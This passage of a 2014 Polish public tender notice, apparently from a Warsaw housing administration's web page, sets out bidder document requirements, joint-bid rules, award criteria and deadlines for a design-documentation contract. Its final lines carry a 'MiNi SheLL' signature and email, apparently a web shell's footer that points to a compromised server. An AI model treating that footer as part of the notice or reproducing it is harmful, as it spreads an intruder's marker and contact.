1.4. 	informację o części / częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom, o ile Wykonawca będzie realizował zamówienie z udziałem podwykonawców,  
1.5.  informację podmiotów i o podmiotach, które będą brały udział w realizacji  części zamówienia, na zasobach, których polega wykonawca na zasadach określonych w pkt. 8.2. siwz, 
             1.6. 	oświadczenie o zapoznaniu się i akceptacji założeń projektowych i 
                          kosztorysowych na wykonanie dokumentacji projektowo-kosztorysowej 
                          na wykonanie dokumentacji projektowo-kosztorysowej na zasypanie 
                          dwóch pomieszczeń użytkowych, znajdujących się poza obrysem budynku 
                          mieszkalnego przy Al. Niepodległości 86 w Warszawie na załączniku nr 1 
                          do wzoru formularza oferty,
1.7.  zobowiązanie do wniesienia zabezpieczenia należytego wykonania umowy na załączniku nr 2 do oferty wg wzoru załączonego do wzoru formularza oferty, 
  1.8.	oświadczenie na załączniku nr 6 do oferty wg wzoru załączonego do wzoru formularza oferty, iż po upływie terminu ważności będzie odnawiać ubezpieczenie na kwotę nie niższą niż równowartość 30.000 złotych polskich na czas obejmujący wykonanie przedmiotu zamówienia oraz, że przedłoży Zamawiającemu do wglądu oryginał odnowionego ubezpieczenia w terminie 7 dni kalendarzowych od daty jego zawarcia, jednakże nie później niż w dniu podpisania umowy w przypadku gdy 
                dotychczasowe ubezpieczenie wygasa po terminie składania ofert, 
             1.9.   informacji określonej w pkt. 18.1.1.  specyfikacji w przypadku    
                           zastosowania  przez wykonawcę innej niż (23 %) stawki podatku od   
                           towarów i usług, obowiązującej w dacie składania ofert.

    2. W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w pkt. 8 SIWZ, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące dokumenty: 
             2.1. oświadczenie na załączniku nr 3 do oferty wg wzoru załączonego do 
                         wzoru formularza oferty, że spełnia warunki określone w art. 22 ust.1
                         ustawy Prawo zamówień publicznych, 
2.2. 	wykaz głównych usług, wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3-ch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat  wykonania i podmiotów na rzecz których usługi zostały wykonane, potwierdzający spełnienie warunku określonego w pkt. 8.1.1.  specyfikacji na załączniku nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty, 
2.3. 	wykaz osób które będą uczestniczyć w wykonaniu zamówienia, potwierdzający spełnienie warunku określonego w pkt. 8.1.2. specyfikacji na załączniku nr 5 do oferty wg wzoru załączonego do wzoru formularza oferty,
2.4. opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 30.000 PLN.
2.5. dowody dotyczące usług, określające czy usługi te, (wykazane przez Wykonawcę w załączniku nr 4 do oferty, zgodnie z zapisem pkt. 8.1.1. i 9.2.2. specyfikacji istotnych warunków zamówienia) zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa w zdaniu poprzednim są: 
              a)poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
 b)oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o których mowa w pkt. a),
 W przypadku gdy Wykonawca wskazuje w wykazie usług usługi, które wcześniej zostały wykonane na rzecz Zamawiającego, nie ma obowiązku przedkładania w/w dowodów.
2.6. W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            2.6.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            2.6.2.   pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           2.6.3.   inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2.
                             SIWZ.
                       
   3. 	W celu wykazania braku podstaw do wykluczenia z postępowania  o 
             udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w  
             art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:
3.1. 	oświadczenie na załączniku nr 7 do oferty wg wzoru załączonego do wzoru formularza oferty o braku podstaw wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych,  
3.2. 	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, 
3.3.  Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt. 8 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w pkt. 8.2. SIWZ, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest załączyć dokumenty wymienione w pkt. 9.2.6. i 9.3 i/lub 9.7. SIWZ, odnoszące się do tych podmiotów.
   4.  W celu wykazania braku podstaw do wykluczenia z postępowania  o   
             udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w  
             art. 24 ust. 2 pkt. 5  ustawy, Wykonawca zobowiązany jest złożyć wraz z 
             ofertą listę podmiotów należących do tej samej grupy kapitałowej, o której mowa 
             w art. 24 ust. 2 pkt. 5 ustawy pzp lub informację o braku przynależności do grupy 
             kapitałowej - wzór druku stanowi załącznik nr 8 do oferty wg wzoru 
             załączonego do wzoru formularza oferty.

   5.   W celu potwierdzenia że oferowane usługi odpowiadają wymaganiom   
              określonym przez Zamawiającego  w SIWZ; 
              Zamawiający nie wymaga złożenia dokumentów na potwierdzenie, że oferowane 
              usługi  odpowiadają wymaganiom określonym przez Zamawiającego. Za 
              spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt 
              9.2.1. SIWZ i wypełnienie formularza oferty.

   6. Oferta wspólna
    6.1. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej   
                 Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) 
                 pod warunkiem, że żaden z Wykonawców wspólnie ubiegających się o 
                 udzielenie zamówienia nie podlega wykluczeniu na podstawie art. 24 ust. 1 
                 i 24 ust. 2 pkt. 5 ustawy Pzp, a taka oferta spełniać będzie następujące 
                 wymagania: 
                6.1.1.	Wykonawcy występujący wspólnie są zobowiązani do 
                                ustanowienia Pełnomocnika do reprezentowania ich w 
                                postępowaniu albo do reprezentowania ich w postępowaniu i 
                                zawarcia umowy w sprawie przedmiotowego zamówienia 
                                publicznego;
.1.2. 	Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza lub inny dokument (np. Umowa konsorcjum, spółki cywilnej) powinien być załączony do oferty i zawierać w szczególności wskazanie: 
a)  postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)  ustanowionego Pełnomocnika oraz zakres jego umocowania;
6.1.3.	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
6.1.4. Każdy z Wykonawców (każdy członek konsorcjum)  składających ofertę  wspólną musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy pzp. W tym celu konsorcjum składa oświadczenie, o którym mowa w pkt. 9.3.1. i 9.4. siwz podpisane przez wszystkich Wykonawców oraz dokumenty określone w pkt. 9.2.4. i/lub 9.7.1., 9.7.2. siwz  dla wszystkich Wykonawców podpisane za zgodność z oryginałem przez Wykonawców.
6.1.5. W odniesieniu do warunków określonych w art. 22 ust. 1 ustawy 
wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (na ich potwierdzenie należy złożyć dokumenty określone w pkt. 9.2. siwz)  z zastrzeżeniem, że oświadczenie, o którym mowa w pkt. 9.2.1. siwz podpisane przez Pełnomocnika lub wszystkich Wykonawców musi być złożone w imieniu wszystkich  Wykonawców;

     6.2. 	Wszelka korespondencja prowadzona będzie przez Zamawiającego  
                  wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu 
                  oferty.

     6.3. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, 
                 Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia 
                 publicznego, umowy regulującej współpracę tych Wykonawców.

             6.4. W przypadku złożenia oferty wspólnej Wykonawcy solidarnie odpowiadać 
                         będą za wykonanie zamówienia.

     7. Dotyczy Wykonawców mających siedzibę lub miejsce zamieszkania poza 
              terytorium Rzeczypospolitej Polskiej.
            7.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
                         Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.  
                         9.3.2.  specyfikacji - składa dokument lub dokumenty wystawione 
  w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające  
                          odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
                   Dokumenty, o których mowa w pkt. 9.7.1. SIWZ powinny być wystawione 
                   nie   wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
             7.2. 	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca   
                           ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o 
                           których mowa w pkt. 9.7.1., zastępuje się je dokumentem zawierającym 
                           oświadczenie, w którym określa się także osoby uprawnione do 
                           reprezentacji Wykonawcy,  złożone przed notariuszem, właściwym 
                           organem sądowym, administracyjnym albo organem samorządu 
                           zawodowego lub gospodarczego odpowiednio miejsca zamieszkania 
                           osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce 
                           zamieszkania. Zapisy pkt. 9.7.1 SIWZ odnoszące się do wymaganych 
                           terminów ważności poszczególnych dokumentów stosuje się 
                           odpowiednio. jw.
            7.3.  W przypadku Wykonawców mających siedzibę lub miejsce zamieszkania  
                         poza terytorium Rzeczypospolitej Polskiej wszystkie wykazywane przez 
                         nich w załącznikach do oferty częściowej i dokumentach wartości i kwoty  
                        w EURO będą przeliczane przez Zamawiającego w/g średniego kursu NBP na dzień upublicznienia postępowania.

     8. W PRZYPADKU, GDY WYKONAWCA W MIEJSCE KTÓREGOŚ Z DOKUMENTÓW, 
   O KTÓRYCH MOWA W PKT 9.2.4., 9.2.5., 9.3.2.., 9.7.1.., 9.7.2.,               SPECYFIKACJI DOSTARCZY JEGO KOPIĘ, KOPIA TA MUSI BYĆ POŚWIADCZONA 
              ZA ZGODNOŚĆ Z ORYGINAŁEM zgodnie z zapisem pkt. 14.6.4 specyfikacji 
              istotnych warunków zamówienia przy czym w przypadku Wykonawców 
              wspólnie ubiegających się o udzielenie zamówienia, zgodnie z zapisem pkt. 
              14.6.5. siwz  Zamawiający może zażądać przedstawienia oryginałów lub 
              notarialnie potwierdzonych kopii dokumentów np., gdy złożone  kopie
              dokumentów będą nieczytelne lub będą budzić wątpliwości co do ich 
              prawdziwości.

     9. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. 
          Dokumenty i oświadczenia sporządzone w języku obcym, są składane wraz z 
          tłumaczeniem  na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - skrócenie czasu realizacji zamówienia - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień 
                     umowy o ile  warunkiem wprowadzenia takich zmian będą między innymi 
                     okoliczności, których nie można było przewidzieć w chwili zawarcia umowy 
                      lub zmiany te będą korzystne dla Zamawiającego. Zamawiający dopuszcza 
                      możliwość zmiany umowy w szczególności w następujących przypadkach:
        a) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia    
        umowy          wraz ze skutkami takiej zmiany regulacji prawnych;
        b) ograniczenia środków budżetowych na realizację Przedmiotu 
        umowy;
        c) zmiany zakresu rzeczowego i finansowego;
                     d)  zmiany osób uczestniczących w realizacji Przedmiotu  umowy;
               e) powierzenia Podwykonawcy wykonania części lub całości przedmiotu 
               zamówienia lub zmiany Podwykonawców w sytuacji, gdy z przyczyn, których 
               nie można było przewidzieć w chwili zawarcia umowy z Podwykonawcą, 
               koniecznym będzie dla prawidłowego wykonania umowy posłużenie się 
               przez Wykonawcę nowym Podwykonawcą, który będzie realizował część lub 
               cały zakres powierzony uprzednio innym Podwykonawcom. Jeżeli zmiana 
               albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby
               Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b
               Ustawy pzp, w celu wykazania spełniania warunków udziału w 
               postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp, Wykonawca jest 
               obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca 
               lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż 
               wymagany w trakcie postępowania o udzielenie zamówienia będącego 
               przedmiotem zamówienia;
                      f)zmiany terminu realizacji przedmiotu umowy w następstwie 
                      wydłużających/wykraczających poza ustawowe terminy procedur 
                      administracyjnych oraz innych terminów spraw urzędowych, mających 
                      wpływ na termin realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnmokotow.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego przy ul. Irysowej 19 w Warszawie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2014 godzina 10:00, miejsce: W siedzibie Zamawiającego przy ul. Irysowej 19 w Warszawie pok. 34..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com